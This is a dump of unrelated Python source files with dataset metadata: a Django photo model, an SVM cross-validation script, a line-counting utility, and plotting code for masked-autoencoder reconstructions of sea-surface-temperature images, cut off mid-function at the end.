\n","sub_path":"source/github_wendykan_kaggle-bike-share-master/myGBR_2model_casualreg.py","file_name":"myGBR_2model_casualreg.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"407100319","text":"\"\"\"Module contain photo model class and methods.\"\"\"\n\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.db import models\n\nfrom checkpoint.models import Checkpoint\nfrom registration.models import CustomUser\nfrom trip.models import Trip\n\n\nclass Photo(models.Model):\n \"\"\"\n Photo\n :argument id: int - auto generated primary key\n :argument src: url - photo source link\n :argument user: - foreign key to User model\n :argument trip: - foreign key to Trip model\n :argument checkpoint: - foreign to Checkpoint model\n :argument description: str - description to photo\n :argument create_at: date - time when created\n :argument updated_at: date - time when updated.\n \"\"\"\n\n src = models.URLField()\n user = models.ForeignKey(CustomUser, null=True)\n trip = models.ForeignKey(Trip, null=True)\n checkpoint = models.ForeignKey(Checkpoint, null=True)\n title = models.TextField(null=True)\n description = models.TextField(null=True)\n create_at = models.DateTimeField(auto_now_add=True)\n update_at = models.DateTimeField(auto_now=True, editable=True)\n\n @staticmethod\n def get_by_id(photo_id):\n \"\"\"\n Get photo with given photo id\n Args:\n photo_id (int): photo id.\n Returns:\n Object: Object of Photo or None if got exception.\n \"\"\"\n try:\n return Photo.objects.get(id=photo_id)\n except ObjectDoesNotExist:\n return None\n\n @staticmethod\n def filter(trip_id, checkpoint_id):\n \"\"\"\n Get photo with given trip and checkpoint id\n Args:\n trip_id (int): trip id\n checkpoint_id (int): checkpoint id.\n trip_id (int): trip id.\n\n Returns:\n QuerySet: QuerySet of Photos.\n \"\"\"\n return Photo.objects.filter(trip_id=trip_id, checkpoint_id=checkpoint_id)\n\n @staticmethod\n def create(src, user, title=None, description=None, trip=None, checkpoint=None):\n \"\"\" Creating photo model, and returns created object\"\"\"\n photo = Photo()\n photo.src = src\n photo.trip = trip\n photo.checkpoint = checkpoint\n photo.user = user\n photo.title = title\n photo.description = description\n photo.save()\n return photo\n\n def update(self, title=None, description=None):\n \"\"\"Updating photo title and description.\"\"\"\n if title:\n self.title = title\n if description:\n self.description = description\n self.save()\n\n def to_dict(self):\n \"\"\"Convert model object to dictionary.\n Return:\n dict:\n {\n 'id': id,\n 'src': source link,\n 'user': user id,\n 'trip_id': trip id,\n 'checkpoint_id': checkpoint id,\n 'title': title text,\n 'description': description text,\n 'create_at': time when created,\n 'update_at': time when last updated,\n 'user_name': author's name,\n 'main_photo': True if this photo main trip image, else False\n }\n \"\"\"\n return {\n \"id\": self.id,\n \"src\": self.src,\n \"user\": self.user.id if self.user else None,\n \"trip_id\": self.trip.id if self.trip else None,\n \"checkpoint_id\": self.checkpoint.id if self.checkpoint else None,\n \"title\": self.title,\n \"description\": self.description,\n \"create_at\": self.create_at,\n \"update_at\": self.update_at,\n \"user_name\": (self.user.get_full_name() if self.user.get_full_name()\n else self.user.email),\n 'main_photo': True if self.trip.src == self.src else False,\n }\n","sub_path":"myTrip/photo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"209338827","text":"import getopt, re, sys\nfrom svmutil import *\nfrom sklearn.metrics import confusion_matrix, recall_score\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nimport random\n\n\ndef getFeatures(data):\n features = data.split(\"\\n\")\n features = [feature.replace(\"\\n\", \"\") for feature in features]\n features.remove('')\n\n featuresInList = []\n for feature in features:\n featureList = feature.split(';')\n featureList = [float(inFeature) for inFeature in featureList]\n if (featureList != ['']):\n featuresInList.append(featureList)\n\n return featuresInList\n\n\ndef getLabels(data):\n labels = data.split(\"\\n\")\n labels.remove('')\n labels = [float(re.sub(\"[^0-9]\", \"\", label)) for label in labels]\n\n return labels\n\n\ndef separateDataIntoFolds(data, foldList):\n dataInFolds = [[] for i in range(len(set(foldList)))]\n loopIndex=0\n for foldIndex in foldList:\n dataInFolds[int(foldIndex)-1].append(data[loopIndex])\n loopIndex = loopIndex + 1\n\n return dataInFolds\n\n\ndef upSamplingDataSet(data, requiredLength):\n while(len(data) != requiredLength):\n if((requiredLength - len(data)) >= len(data)):\n for elem in data.copy():\n data.append(elem)\n else:\n dataCopy = data.copy()\n numberOfMissingData = requiredLength-len(data)\n indexArray = list(range(1, len(data)))\n random.shuffle(indexArray)\n for i in range(numberOfMissingData):\n data.append(dataCopy[i])\n\n return data\n\n\ndef main(argv):\n trainFileName = ''\n testFileName = ''\n testLabelFileName = ''\n inputTestFeatures = []\n inputTestLabels = []\n crossvalidationLabels = []\n isUpsamplingNeeded = False\n \n try:\n opts, args = getopt.getopt(argv,\"h:r:n:e:s:t:c:u\",[\"itrainlabelfile=\",\"itrainfile=\",\"itestlabelfile=\",\"itestfile=\",\"trainwithtest=\", \"crossvalidationfile=\", \"upsampling=\"])\n except getopt.GetoptError:\n print(getopt.GetoptError)\n print('startClass.py -n -r -s -e -t -c -u ')\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print('startClass.py --itrainlabelfile --itrainfile --itestlabelfile --itestfile --trainwithtest --crossvalidationfile --upsampling ')\n sys.exit()\n elif opt in (\"-r\", \"--itrainfile\"):\n trainFileName = arg\n file = open(trainFileName)\n data = file.read(1000000000)\n inputFeatures = getFeatures(data)\n elif opt in (\"-n\", \"--itrainlabelfile\"):\n trainLabelFileName = arg\n file = open(trainLabelFileName)\n data = file.read(1000000000)\n inputLabels = getLabels(data)\n elif opt in (\"-e\", \"--itestfile\"):\n testFileName = arg\n elif opt in (\"-s\", \"--itestlabelfile\"):\n testLabelFileName = arg\n elif opt in (\"-t\", \"--trainwithtest\"):\n file = open(testLabelFileName)\n data = file.read(1000000000)\n inputTestLabels = getLabels(data)\n print(\"read test file\")\n file = open(testFileName)\n data = file.read(1000000000)\n inputTestFeatures = getFeatures(data)\n elif opt in (\"-c\", \"--crossvalidationfile\"):\n crossvalidationFileName = arg\n file = open(crossvalidationFileName)\n data = file.read(1000000000)\n crossvalidationLabels = getLabels(data)\n elif opt in (\"-u\", \"--upsampling\"):\n isUpsamplingNeeded = True\n\n resultFile = open(\"../result/\" + str(trainFileName.split('\\\\')[-1]) + \"_pythonTrainResults.txt\", \"a+\")\n random.seed(42)\n\n trainDataInFolds = separateDataIntoFolds(inputFeatures, crossvalidationLabels)\n trainLabelInFolds = separateDataIntoFolds(inputLabels, crossvalidationLabels)\n\n preprocessedDataInFolds = [[] for i in range(len(trainDataInFolds))]\n preprocessedLabelInFolds = [[] for i in range(len(trainLabelInFolds))]\n\n preprocessedDataForTest = []\n preprocessedLabelForTest = []\n\n if(isUpsamplingNeeded):\n for i in range(len(trainDataInFolds)):\n dataFold = trainDataInFolds[i].copy()\n labelFold = trainLabelInFolds[i].copy()\n dataSeparatedByClass = [[] for index in range(len(set(labelFold)))]\n\n for j in range(len(labelFold)):\n dataSeparatedByClass[int(labelFold[j])-1].append(dataFold[j])\n #start upsampling\n largestClassSize = max(len(data) for data in dataSeparatedByClass)\n for k in range(len(dataSeparatedByClass)):\n dataByClass = upSamplingDataSet(dataSeparatedByClass[k].copy(), largestClassSize)\n #print(len(dataByClass))\n for sample in dataByClass:\n preprocessedDataInFolds[i].append(sample.copy())\n preprocessedLabelInFolds[i].append(k+1)\n\n if (len(inputTestFeatures) > 0):\n testDataSeparatedByClass = [[] for index in range(len(set(inputLabels)))]\n for j in range(len(inputLabels)):\n testDataSeparatedByClass[int(inputLabels[j])-1].append(inputFeatures[j])\n largestTestClassSize = max(len(data) for data in testDataSeparatedByClass)\n for k in range(len(testDataSeparatedByClass)):\n dataByClass = upSamplingDataSet(testDataSeparatedByClass[k].copy(), largestTestClassSize)\n for sample in dataByClass:\n preprocessedDataForTest.append(sample.copy())\n preprocessedLabelForTest.append(k + 1)\n\n else:\n preprocessedDataInFolds = trainDataInFolds\n preprocessedLabelInFolds = trainLabelInFolds\n preprocessedDataForTest = inputFeatures\n preprocessedLabelForTest = inputLabels\n\n resultFile.write('\\n' + trainFileName + '\\n') \n\n for i in range(-5,2):\n print(\"SVM complexity: \" + str(pow(10,i)))\n newParameters = '-b 1 -q -t 0 -c ' + str(pow(10,i))\n svmParameters = svm_parameter(newParameters)\n classSequence = []\n predictedPercentValues = [[] for i in range(len(inputLabels))]\n allPredictedLabel = []\n\n #start crossvalidation\n for crossvalidationRoundIndex in range(0,len(set(crossvalidationLabels))):\n print('calculate ' + str(crossvalidationRoundIndex) + ' of ' + str(len(set(crossvalidationLabels))-1) + ' folds crossvalidation')\n\n flatTestFold = preprocessedDataInFolds[crossvalidationRoundIndex].copy()\n flatTestLabelFold = preprocessedLabelInFolds[crossvalidationRoundIndex].copy()\n\n trainFold = preprocessedDataInFolds.copy()\n trainLabelFold = preprocessedLabelInFolds.copy()\n trainFold.remove(flatTestFold)\n trainLabelFold.remove(flatTestLabelFold)\n flatTrainFold = [item for sublist in trainFold for item in sublist]\n flatTrainLabelFold = [item for sublist in trainLabelFold for item in sublist]\n\n StandardScaler(copy=True, with_mean=True, with_std=True)\n standardizedFlatTrainData = StandardScaler().fit_transform(flatTrainFold)\n standardizedFlatTestData = StandardScaler().fit_transform(flatTestFold)\n\n problem = svm_problem(flatTrainLabelFold, standardizedFlatTrainData)\n modell = svm_train(problem, svmParameters)\n predictedLabels, predictedAccurancy, predictedVal = svm_predict(flatTestLabelFold, standardizedFlatTestData, modell, options='-b 1 -q')\n \n classSequence = modell.get_labels().copy()\n \n loopIndex = 0\n #test saples are chosen from the original train samples and after crossvalidation every test sample has percentages for every class so we want to collect them in the original sequence\n for testSample in flatTestFold:\n sampleIndex = [k for k, x in enumerate(inputFeatures) if x == testSample]\n for ind in sampleIndex:\n if crossvalidationLabels[ind] == crossvalidationRoundIndex+1:\n predictedPercentValues[ind] = predictedVal[loopIndex].copy()\n loopIndex = loopIndex + 1\n\n #end crossvalidation\n for percentages in predictedPercentValues:\n maximumPercentage = max(percentages)\n allPredictedLabel.append(classSequence[percentages.index(maximumPercentage)])\n \n resultFile.write('\\n\\nSVM complexity: \\t' + str(pow(10,i)))\n resultFile.write('\\nCross validation average UAR: \\t' + str(recall_score(inputLabels, allPredictedLabel, average='macro')))\n confusionMatrix = confusion_matrix(inputLabels, allPredictedLabel)\n\n if(len(inputTestFeatures) > 0):\n print(\"start test\")\n problem = svm_problem(preprocessedLabelForTest, preprocessedDataForTest)\n modell = svm_train(problem, svmParameters)\n testPredictedLabels, testPredictedAccurancy, testPredictedVal = svm_predict(inputTestLabels, inputTestFeatures, modell, options='-b 1 -q')\n testUAR = recall_score(inputTestLabels, testPredictedLabels, average='macro')\n resultFile.write('\\ntest database UAR: \\t' + str(testUAR))\n\n resultFile.flush()\n \n resultFile.close()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"python/startClass.py","file_name":"startClass.py","file_ext":"py","file_size_in_byte":9734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"536950594","text":"#!/usr/bin/env python\n__author__ = 'Albino'\n\n\"\"\"\n有个目录,里面是你自己写过的程序,统计一下你写过多少行代码。包括空行和注释,但是要分别列出来。\n\"\"\"\n\nimport os\n\n\ndef walk_dir(path):\n file_path = []\n for root, dirs, files in os.walk(path):\n for file in files:\n if file.lower().endswith(\"py\"):\n file_path.append(os.path.join(path, file))\n return file_path\n\n\ndef count_the_code(path):\n file_name = os.path.basename(path)\n code_num = 0\n blank_num = 0\n note_num = 0\n flag = False\n with open(path, mode='r', encoding='utf-8') as f:\n lines = f.read().split('\\n')\n for line in lines:\n code_num += 1\n if line.strip().startswith('\"\"\"') and not flag:\n note_num += 1\n flag = True\n continue\n if line.strip().startswith('\"\"\"'):\n note_num += 1\n flag = False\n if line.strip().startswith('#') or flag:\n note_num += 1\n if len(line) == 0:\n blank_num += 1\n print(\"在%s中,共有%s行代码,其中有%s空行,有%s注释\" % (file_name, code_num, blank_num, note_num))\n\n\nif __name__ == '__main__':\n for code_path in walk_dir(\".\"):\n count_the_code(code_path)\n","sub_path":"007/007.py","file_name":"007.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219665645","text":"from dataclasses import replace\nfrom datetime import datetime\nimport os, sys, requests\nimport numpy as np\nimport scipy\nfrom scipy import stats\nfrom urllib.parse import urlparse\nimport datetime\n\nimport argparse\n\nimport healpy as hp\n\nimport matplotlib as mpl\nimport matplotlib.gridspec as gridspec\nfrom matplotlib import pyplot as plt\nfrom matplotlib.patches import Rectangle, Ellipse\nfrom scipy.optimize import curve_fit\n\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nmpl.rcParams['font.family'] = 'stixgeneral'\n\nimport pandas as pd\nimport seaborn as sns\nfrom matplotlib import ticker\nimport h5py\n\nfrom ulmo import plotting\nfrom ulmo.utils import utils as utils\nfrom ulmo import io as ulmo_io\nfrom ulmo.ssl import single_image as ssl_simage\nfrom ulmo.ssl import defs as ssl_defs\nfrom ulmo.mae import patch_analysis\ntry:\n from ulmo.mae import models_mae\nexcept ModuleNotFoundError:\n print(\"Could not import models_mae\")\nfrom ulmo.utils import image_utils\n\n\nimport requests\n\nimport torch\n\nfrom PIL import Image\nfrom ulmo.plotting import plotting\n\nfrom IPython import embed\n\n\n\n##############################################################\n# ------------- Generate Cloud Coverage Plot------------------\n##############################################################\ndef fig_cloud_coverage(filepath='data/modis_2020_cloudcover.npz', \n outfile='cloud_coverage.png'):\n\n #filepath = 'data/modis_2020_cloudcover.npz'\n\n data = np.load(filepath)\n lst = data.files\n x = data['CC_values']\n y = data['tot_pix_CC']\n\n from scipy.interpolate import make_interp_spline, BSpline\n # 300 represents number of points to make between T.min and T.max\n xnew = np.linspace(np.min(x), np.max(x), 300)\n\n spl = make_interp_spline(x, y, k=3) # type: BSpline\n power_smooth = spl(xnew)\n sns.set_style(\"whitegrid\")\n sns.set_context(\"paper\")\n\n f, ax = plt.subplots(figsize=(8, 7))\n #ax.set_axisbelow(True)\n #ax.grid(color='gray', linestyle='dashed', linewidth = 0.5)\n\n sns.lineplot(x=xnew, y=power_smooth, color='blue', linewidth=2.5)\n \n ax.set_yscale(\"log\")\n #plt.plot(xnew, power_smooth)\n ax.set_xlim(0,1)\n ax.set_ylim(10**7,10**11)\n #ax.xaxis.set_ticks(np.arange(0, 1, 0.1))\n ax.set_xlabel('Fraction of Clouds in Cutout (CC)')\n ax.set_ylabel(f'Cutouts Available ($N_c$)')\n #ax.set_title(\"Cutouts vs Cloud Coverage\")\n\n #sns.set(rc={\"xtick.bottom\" : True, \"ytick.left\" : True})\n #ax.tick_params(which=\"both\", bottom=True)\n ax.tick_params(axis='y', which='both', direction='out', length=4, left=True,\n color='gray')\n ax.grid(True, which='both', color='gray', linewidth=0.1)\n ax.minorticks_on()\n\n\n\n plotting.set_fontsize(ax, 15)\n\n plt.savefig(outfile, dpi=300)\n plt.close()\n print(f'Wrote: {outfile}')\n\n\n##############################################################\n# --------- Generate Encoder, Decoder, and Recon ------------\n##############################################################\n\"\"\"\nFor single image reconstructions.\n\"\"\"\ndef prepare_model(chkpt_dir, arch='mae_vit_LLC_patch4'):\n # build model\n model = getattr(models_mae, arch)()\n # load model\n checkpoint = torch.load(chkpt_dir, map_location='cpu')\n msg = model.load_state_dict(checkpoint['model'], strict=False)\n print(msg)\n return model\n\ndef run_one_image(img, model, mask_ratio):\n x = torch.tensor(img)\n\n # make it a batch-like\n x = x.unsqueeze(dim=0)\n x = torch.einsum('nhwc->nchw', x)\n\n # run MAE\n loss, y, mask = model(x.float(), mask_ratio)\n y = model.unpatchify(y)\n y = torch.einsum('nchw->nhwc', y).detach().cpu()\n\n # visualize the mask\n mask = mask.detach()\n mask = mask.unsqueeze(-1).repeat(1, 1, model.patch_embed.patch_size[0]**2 *1) # (N, H*W, p*p*3)\n mask = model.unpatchify(mask) # 1 is removing, 0 is keeping\n mask = torch.einsum('nchw->nhwc', mask).detach().cpu()\n \n x = torch.einsum('nchw->nhwc', x)\n\n # masked image\n im_masked = x * (1 - mask)\n\n # MAE reconstruction pasted with visible patches\n im_paste = x * (1 - mask) + y * mask\n \n im = im_paste.cpu().detach().numpy()\n m = mask.cpu().detach().numpy()\n re = y.cpu().detach().numpy()\n im = im.squeeze()\n m = m.squeeze()\n re = re.squeeze()\n print('reconstruction complete')\n \n return im, m, re\n\ndef plot_encoder_decoder(orig_img, recon_img, recon_full, mask_img, idx,\n apply_bias=False, vmnx = [None, None],\n LL_file='MAE_LLC_valid_nonoise.parquet'):\n \"\"\"\n Plots the:\n 1) Original image\n 2) Masked image\n 3) Encoder Results\n 4) Decoder Results\n 5) Reconstructed Image\n \"\"\"\n # Load Unmasked\n unmasked = 1 - mask_img\n\n # Bias\n diff_true = recon_img - orig_img\n bias = np.median(diff_true[np.abs(diff_true)>0.])\n\n # Find the patches\n p_sz = 4\n patches = patch_analysis.find_patches(mask_img, p_sz)\n upatches = patch_analysis.find_patches(unmasked, p_sz)\n\n\n fig = plt.figure(figsize=(13, 4))\n plt.clf()\n gs = gridspec.GridSpec(1,5)\n ax0 = plt.subplot(gs[0])\n\n _, cm = plotting.load_palette()\n cbar_kws={'label': 'SSTa (K)',\n 'fraction': 0.0450,\n 'location': 'top'}\n\n _ = sns.heatmap(np.flipud(orig_img), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, \n cbar_kws=cbar_kws,\n ax=ax0)\n\n # Reconstructed\n sub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n diff = np.ones_like(recon_img) * np.nan\n frecon = recon_img.copy()\n\n # Reconstructed\n usub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n udiff = np.ones_like(recon_img) * np.nan\n ufrecon = recon_img.copy()\n\n # Plot/fill the patches for masked image\n for kk, patch in enumerate(upatches):\n i, j = np.unravel_index(patch, unmasked.shape)\n # Fill\n usub_recon[i:i+p_sz, j:j+p_sz] = orig_img[i:i+p_sz, j:j+p_sz]\n ufrecon[i:i+p_sz, j:j+p_sz]\n # ???\n udiff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n\n # Unmasked image\n ax1 = plt.subplot(gs[1])\n\n u_recon = False\n if u_recon:\n usub_recon = ufrecon.copy()\n _ = sns.heatmap(np.flipud(usub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax1)\n\n \n # Plot/fill the patches for latent vector\n for kk, patch in enumerate(upatches):\n i, j = np.unravel_index(patch, unmasked.shape)\n # Fill\n usub_recon[i:i+p_sz, j:j+p_sz] = recon_full[i:i+p_sz, j:j+p_sz]\n ufrecon[i:i+p_sz, j:j+p_sz]\n # ???\n udiff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n \n # Unmasked image\n ax2 = plt.subplot(gs[2])\n\n u_recon = False\n if u_recon:\n usub_recon = ufrecon.copy()\n _ = sns.heatmap(np.flipud(usub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax2)\n \n # Full Recon image\n ax3 = plt.subplot(gs[3])\n\n full_recon = True\n if apply_bias:\n cbar_kws['label'] = 'SSTa (K) ({:.3f} bias)'.format(bias)\n if full_recon:\n sub_recon = frecon.copy()\n _ = sns.heatmap(np.flipud(recon_full), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax3)\n\n # Recon image\n ax4 = plt.subplot(gs[4])\n\n full_recon = True\n if apply_bias:\n cbar_kws['label'] = 'SSTa (K) ({:.3f} bias)'.format(bias)\n if full_recon:\n sub_recon = frecon.copy()\n _ = sns.heatmap(np.flipud(sub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax4)\n\n # Borders\n # \n for ax, title in zip( [ax0, ax1, ax2 ,ax3, ax4],\n ['Original', 'Masked', 'Latent Representation', 'Decoder Results', 'Original + Reconstructed']):\n ax.patch.set_edgecolor('black') \n ax.patch.set_linewidth(1.) \n #\n show_title=True\n if show_title:\n ax.set_title(title, fontsize=16, y=-0.14)\n \n # Plot title\n table = pd.read_parquet(LL_file, engine='pyarrow',columns=['pp_idx', 'LL'])\n table = table[table['LL'].notna()]\n table = table.sort_values(by=['pp_idx'])\n LL = int(table.iloc[idx]['LL'])\n #fig.suptitle('{LL} LL Reconstruction: t{model} {p}% masking'.format(LL=LL))\n fig.suptitle('{LL} LL Reconstruction'.format(LL=LL))\n \n plt.tight_layout(pad=0.5, h_pad=0.5, w_pad=0.5)\n outfile = 'training_visual.png'\n plt.savefig(outfile, dpi=300)\n plt.close()\n print('Wrote {:s}'.format(outfile))\n\ndef figs_training(idx=85674, \n filepath=os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'PreProc', \n 'MAE_LLC_valid_nonoise_preproc.h5'), \n model_filepath=os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'Models',\n 'Enki_t75.pth'),\n table = 'data/MAE_LLC_valid_nonoise.parquet'):\n \"\"\"\n Create fig\n \"\"\"\n # load image and model\n f = h5py.File(filepath, 'r')\n img = f['valid'][idx][0]\n img.resize((64,64,1))\n model = prepare_model(model_filepath, 'mae_vit_LLC_patch4')\n print('Model75 loaded.')\n \n # Reconstruct\n recon_img, mask, full_recon = run_one_image(img, model, 0.75)\n orig_img = img.squeeze()\n \n plot_encoder_decoder(orig_img, recon_img, full_recon, mask, idx, apply_bias=False, vmnx = [-1.8, 1.8], \n LL_file=table)\n\n return\n\n##############################################################\n# --------------- Generate Interesting Recons ----------------\n##############################################################\ndef plot_recon(orig_img, recon_img, mask_img, idx,\n apply_bias=False, vmnx = [None, None, None, None],\n outfile='recon.png',\n LL_file = os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'Tables', \n 'MAE_LLC_valid_nonoise.parquet')):\n \"\"\"\n Plots the:\n 1) Original Image\n 2) Masked Image\n 3) Reconstructed Image\n 4) Residuals\n \"\"\"\n # Load Unmasked\n unmasked = 1 - mask_img\n\n # Bias\n embed(header='This is an offset, not a bias. FIX!')\n diff_true = recon_img - orig_img\n bias = np.median(diff_true[np.abs(diff_true)>0.])\n\n # Find the patches\n p_sz = 4\n patches = patch_analysis.find_patches(mask_img, p_sz)\n upatches = patch_analysis.find_patches(unmasked, p_sz)\n\n\n fig = plt.figure(figsize=(9, 4))\n plt.clf()\n gs = gridspec.GridSpec(1,4)\n ax0 = plt.subplot(gs[0])\n\n _, cm = plotting.load_palette()\n cbar_kws={'label': 'SSTa (K)',\n 'fraction': 0.0450,\n 'location': 'top'}\n\n _ = sns.heatmap(np.flipud(orig_img), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, \n cbar_kws=cbar_kws,\n ax=ax0)\n\n # Reconstructed\n sub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n diff = np.ones_like(recon_img) * np.nan\n frecon = recon_img.copy()\n\n # Plot/fill the patches\n for kk, patch in enumerate(patches):\n i, j = np.unravel_index(patch, mask_img.shape)\n \n # Fill\n sub_recon[i:i+p_sz, j:j+p_sz] = recon_img[i:i+p_sz, j:j+p_sz]\n frecon[i:i+p_sz, j:j+p_sz]\n # ???\n diff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n if apply_bias:\n sub_recon[i:i+p_sz, j:j+p_sz] = recon_img[i:i+p_sz, j:j+p_sz] - bias\n frecon[i:i+p_sz, j:j+p_sz] -= bias\n # ???\n diff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz] - bias\n \n\n\n # Reconstructed\n usub_recon = np.ones_like(recon_img) * np.nan\n # Difference\n udiff = np.ones_like(recon_img) * np.nan\n ufrecon = recon_img.copy()\n\n # Plot/fill the patches\n for kk, patch in enumerate(upatches):\n i, j = np.unravel_index(patch, unmasked.shape)\n # Fill\n usub_recon[i:i+p_sz, j:j+p_sz] = orig_img[i:i+p_sz, j:j+p_sz]\n ufrecon[i:i+p_sz, j:j+p_sz]\n # ???\n udiff[i:i+p_sz, j:j+p_sz] = diff_true[i:i+p_sz, j:j+p_sz]\n\n # Unmasked image\n ax1 = plt.subplot(gs[1])\n\n u_recon = False\n if u_recon:\n usub_recon = ufrecon.copy()\n _ = sns.heatmap(np.flipud(usub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax1)\n\n # Recon image\n ax2 = plt.subplot(gs[2])\n\n full_recon = True\n if apply_bias:\n cbar_kws['label'] = 'SSTa (K) ({:.3f} bias)'.format(bias)\n if full_recon:\n sub_recon = frecon.copy()\n _ = sns.heatmap(np.flipud(sub_recon), xticklabels=[],\n vmin=vmnx[0], vmax=vmnx[1],\n yticklabels=[], cmap=cm, cbar=True, \n square=True, cbar_kws=cbar_kws,\n ax=ax2)\n\n # Residual image\n ax3 = plt.subplot(gs[3])\n\n cbar_kws['label'] = 'Residuals (K)'\n _ = sns.heatmap(np.flipud(diff), xticklabels=[], \n vmin=vmnx[2], vmax=vmnx[3],\n yticklabels=[], cmap='bwr', cbar=True,\n square=True, \n cbar_kws=cbar_kws,\n ax=ax3)\n\n # Borders\n # \n for ax, title in zip( [ax0, ax1, ax2 ,ax3],\n ['Original', 'Masked', 'Reconstructed', 'Residuals']):\n ax.patch.set_edgecolor('black') \n ax.patch.set_linewidth(1.) \n #\n show_title=True\n if show_title:\n ax.set_title(title, fontsize=14, y=-0.13)\n \n # Plot title\n table = pd.read_parquet(LL_file, engine='pyarrow',columns=['pp_idx', 'LL'])\n table = table[table['LL'].notna()]\n table = table.sort_values(by=['pp_idx'])\n LL = int(table.iloc[idx]['LL'])\n #fig.suptitle('{LL} LL Reconstruction: t{model} {p}% masking'.format(LL=LL))\n fig.suptitle('{LL} LL Reconstruction'.format(LL=LL))\n \n plt.tight_layout(pad=0.5, h_pad=0.5, w_pad=0.5)\n plt.savefig(outfile, dpi=300)\n plt.close()\n print('Wrote {:s}'.format(outfile))\n \n return\n \n \ndef figs_imgs(idx=85674, \n filepath=os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'PreProc', \n 'MAE_LLC_valid_nonoise_preproc.h5'), \n table = os.path.join(os.getenv('OS_OGCM'),\n 'LLC', 'Enki', 'Tables', \n 'MAE_LLC_valid_nonoise.parquet')):\n \"\"\"\n Create fig\n \"\"\"\n # load file and model\n f = h5py.File(filepath, 'r')\n model_filepath_t50=os.path.join(os.getenv('OS_OGCM'),'LLC', 'Enki', \n 'Models','Enki_t50_399.pth')\n model_filepath_t75=os.path.join(os.getenv('OS_OGCM'),'LLC', 'Enki', \n 'Models','Enki_t75_399.pth')\n \n model50 = prepare_model(model_filepath_t50, 'mae_vit_LLC_patch4')\n print('Model50 loaded.')\n model75 = prepare_model(model_filepath_t75, 'mae_vit_LLC_patch4')\n print('Model75 loaded.')\n \n # Reconstruct Corners_Example\n idx = 330469\n seed = 69\n img = f['valid'][idx][0]\n img.resize((64,64,1))\n torch.manual_seed(seed)\n recon_img, mask, full_recon = run_one_image(img, model50, 0.50)\n orig_img = img.squeeze()\n \n plot_recon(orig_img, recon_img, mask, idx, apply_bias=False, outfile='reconstructing_corners.png')\n \n \n # Reconstruct t75 example 2\n idx = 666\n seed = 666\n img = f['valid'][idx][0]\n img.resize((64,64,1))\n torch.manual_seed(seed)\n recon_img, mask, full_recon = run_one_image(img, model75, 0.75)\n orig_img = img.squeeze()\n \n plot_recon(orig_img, recon_img, mask, idx, apply_bias=False, outfile='1.png')\n \n \n # Reconstruct t75 example 2\n idx = 2365\n seed = 345\n img = f['valid'][idx][0]\n img.resize((64,64,1))\n torch.manual_seed(seed)\n recon_img, mask, full_recon = run_one_image(img, model75, 0.75)\n orig_img = img.squeeze()\n \n plot_recon(orig_img, recon_img, mask, idx, apply_bias=False, outfile='2.png')\n \n return\n \n##############################################################\n# ------------------------ Plot Loss -------------------------\n##############################################################\ndef parse(d):\n dictionary = dict()\n # Removes curly braces and splits the pairs into a list\n pairs = d.strip('{}').split(', ')\n for i in pairs:\n pair = i.split(': ')\n # Other symbols from the key-value pair should be stripped.\n dictionary[pair[0].strip('\\'\\'\\\"\\\"')] = float(pair[1].strip('\\'\\'\\\"\\\"'))\n return dictionary\n\ndef plot_loss(filepath='data/log.txt', outfile='loss.png'):\n loss = []\n file = open(filepath, 'rt')\n lines = file.read().split('\\n')\n for l in lines:\n if l != '':\n dictionary = parse(l)\n loss.append(dictionary)\n file.close()\n\n df = pandas.DataFrame(loss)\n f, ax = plt.subplots(figsize=(5, 5))\n sns.lineplot(data = df, x = 'epoch', y = 'train_loss')\n plt.yscale('log')\n ax.tick_params(axis='y', which='both', direction='out', length=4, left=True,\n color='gray')\n ax.grid(True, which='both', color='gray', linewidth=0.1)\n plt.savefig(outfile, dpi=300)\n \n\n \ndef plot_model_bias(filepath='enki_bias_LLC.csv', outfile='model_biases.png'):\n biases = pd.read_csv(filepath)\n colors = ['b','g','m','c']\n models = [10,35,50,75]\n x = 